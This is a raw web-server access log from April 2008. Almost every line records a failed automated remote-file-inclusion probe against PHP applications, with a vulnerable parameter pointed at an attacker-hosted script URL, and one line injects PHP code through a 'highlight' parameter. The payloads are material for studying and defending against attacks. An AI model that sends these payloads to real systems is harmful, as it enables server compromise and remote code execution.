78.134.4.147 - - [01/Apr/2008:09:18:17 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.197.223.82 - - [01/Apr/2008:09:18:31 -0700] "GET /logs/access_080306.log/appserv/main.php?appserv_root=http://w0rms.by.ru/ddos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.197.223.82 - - [01/Apr/2008:09:18:31 -0700] "GET /appserv/main.php?appserv_root=http://w0rms.by.ru/ddos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.197.223.82 - - [01/Apr/2008:09:18:32 -0700] "GET /logs/appserv/main.php?appserv_root=http://w0rms.by.ru/ddos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:09:18:44 -0700] "GET /logs//index.php?skin_file=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:09:18:44 -0700] "GET //index.php?skin_file=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:09:20:03 -0700] "GET /logs/access_080125.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.177.56.40 - - [01/Apr/2008:09:20:16 -0700] "GET //amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
216.177.56.40 - - [01/Apr/2008:09:20:16 -0700] "GET /logs//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:09:20:17 -0700] "GET /logs/access_080125.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.197.223.82 - - [01/Apr/2008:09:20:33 -0700] "GET /logs/access_080305.log/appserv/main.php?appserv_root=http://w0rms.by.ru/ddos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.205.178.120 - - [01/Apr/2008:09:20:58 -0700] "GET //index.php?option=com_custompages&cpage=http://www.markbadmintonclub.co.uk/calendar/tools/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.59.22.92 - - [01/Apr/2008:09:21:05 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.nameserver11.net/billing2/include/html/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
202.59.22.92 - - [01/Apr/2008:09:21:05 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.nameserver11.net/billing2/include/html/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.29.81.233 - - [01/Apr/2008:09:21:21 -0700] "GET /logs/access_080215.log/phpwcms_templateinc_scriptfrontend_rendernavigationconfig_HTML_MENU.php?HTML_MENU_DirPath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.3 - - [01/Apr/2008:09:21:52 -0700] "GET /logs/access_080119.log//amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://discount-guns.com//modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [01/Apr/2008:09:21:53 -0700] "GET /logs//amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://discount-guns.com//modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:21:56 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:21:57 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:21:57 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:22:19 -0700] "GET /logs/access_080305.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:09:22:56 -0700] "GET /logs/access_080128.log/index.php?get=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:09:22:57 -0700] "GET /logs/index.php?get=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:09:23:01 -0700] "GET /logs/access_080118.log/index.php?get=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.233 - - [01/Apr/2008:09:23:33 -0700] "GET /logs/access_071231.log/phpwcms_templateinc_scriptfrontend_rendernavigationconfig_HTML_MENU.php?HTML_MENU_DirPath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:09:23:42 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:09:23:42 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:09:23:43 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:23:52 -0700] "GET /logs/access_080218.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:23:53 -0700] "GET /Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:23:54 -0700] "GET /logs/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.3 - - [01/Apr/2008:09:24:02 -0700] "GET /logs/access_080215.log//amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://discount-guns.com//modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.248.162.89 - - [01/Apr/2008:09:25:11 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.248.162.89 - - [01/Apr/2008:09:25:12 -0700] "GET //index.php?option=com_custompages&cpage=http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.248.162.89 - - [01/Apr/2008:09:25:16 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.213.50 - - [01/Apr/2008:09:25:32 -0700] "GET /logs/access_080113.log//components/com_flyspray/startdown.php?file=http://www.7hlakehouse.com/calendars.html//translations/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.213.50 - - [01/Apr/2008:09:25:33 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.7hlakehouse.com/calendars.html//translations/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.213.50 - - [01/Apr/2008:09:25:33 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.7hlakehouse.com/calendars.html//translations/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.68.207.50 - - [01/Apr/2008:09:25:36 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.207.50 - - [01/Apr/2008:09:25:36 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.207.50 - - [01/Apr/2008:09:25:36 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.207.50 - - [01/Apr/2008:09:25:36 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.207.50 - - [01/Apr/2008:09:25:36 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.207.50 - - [01/Apr/2008:09:25:36 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:09:25:58 -0700] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:09:25:59 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:09:25:59 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:26:26 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:26:26 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:26:26 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:26:26 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:26:27 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:26:27 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.207.50 - - [01/Apr/2008:09:26:32 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.207.50 - - [01/Apr/2008:09:26:35 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.163.141.54 - - [01/Apr/2008:09:26:46 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.64 - - [01/Apr/2008:09:26:57 -0700] "GET /logs/access_080306.log//cart_content.php?cart_isp_root=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [01/Apr/2008:09:26:58 -0700] "GET //cart_content.php?cart_isp_root=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [01/Apr/2008:09:26:58 -0700] "GET /logs//cart_content.php?cart_isp_root=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.190.1.171 - - [01/Apr/2008:09:26:58 -0700] "GET /index.php?s=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:27:19 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:27:19 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:27:19 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:09:27:43 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:09:27:43 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:09:27:44 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.163.141.54 - - [01/Apr/2008:09:27:44 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.atlant.ru/sms/img/images.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.239.177.121 - - [01/Apr/2008:09:27:44 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [01/Apr/2008:09:27:45 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [01/Apr/2008:09:27:45 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.17.225 - - [01/Apr/2008:09:27:57 -0700] "GET /bikes/GPS/WeSTOC2008/ HTTP/1.0" 200 842 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.163.141.54 - - [01/Apr/2008:09:28:02 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.atlant.ru/sms/img/images.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:28:03 -0700] "GET /logs/access_080305.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.134.4.147 - - [01/Apr/2008:09:28:18 -0700] "GET //index.php?option=com_custompages&cpage=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:28:48 -0700] "GET /Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:28:49 -0700] "GET /logs/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.18.207.64 - - [01/Apr/2008:09:29:29 -0700] "GET /logs/access_080313.log//cart_content.php?cart_isp_root=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.163.141.54 - - [01/Apr/2008:09:29:52 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.atlant.ru/sms/img/images.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:30:15 -0700] "GET /logs/access_080215.log/index.php?go1=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:30:15 -0700] "GET /index.php?go1=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:30:16 -0700] "GET /logs/index.php?go1=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:30:16 -0700] "GET /logs/access_080225.log/index.php?go1=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:09:30:31 -0700] "GET /logs/access_080225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:09:30:56 -0700] "GET /logs/access_080118.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:09:30:57 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:09:30:57 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:31:02 -0700] "GET /logs/access.log/account.php?action=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:31:02 -0700] "GET /account.php?action=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.248.162.89 - - [01/Apr/2008:09:31:02 -0700] "GET //index.php?option=com_custompages&cpage=http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:31:03 -0700] "GET /logs/account.php?action=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:09:31:41 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [01/Apr/2008:09:32:16 -0700] "GET /logs/access_080112.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.205.178.120 - - [01/Apr/2008:09:32:20 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.markbadmintonclub.co.uk/calendar/tools/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [01/Apr/2008:09:32:21 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.markbadmintonclub.co.uk/calendar/tools/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:09:32:21 -0700] "GET /logs/access_080112.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:32:28 -0700] "GET /logs/access_080101.log/index.php?pageurl=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:32:29 -0700] "GET /index.php?pageurl=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:32:29 -0700] "GET /logs/index.php?pageurl=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:32:35 -0700] "GET /logs/access_080228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:32:35 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:32:35 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:32:36 -0700] "GET /logs/access_080305.log//newspublish/include.php?path%5Bdocroot%5D=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:09:32:54 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:09:32:54 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:33:19 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:09:33:19 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:33:24 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:33:30 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.191.81.165 - - [01/Apr/2008:09:33:44 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.81.165 - - [01/Apr/2008:09:33:44 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.81.165 - - [01/Apr/2008:09:33:45 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.59.22.92 - - [01/Apr/2008:09:33:53 -0700] "GET /skins/advanced/advanced2.php?pluginpath[0]=http://www.nameserver11.net/billing2/include/html/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
202.59.22.92 - - [01/Apr/2008:09:33:53 -0700] "GET /logs/skins/advanced/advanced2.php?pluginpath[0]=http://www.nameserver11.net/billing2/include/html/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
193.189.74.29 - - [01/Apr/2008:09:34:00 -0700] "GET /logs/access_080125.log/myevent.php?myevent_path=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
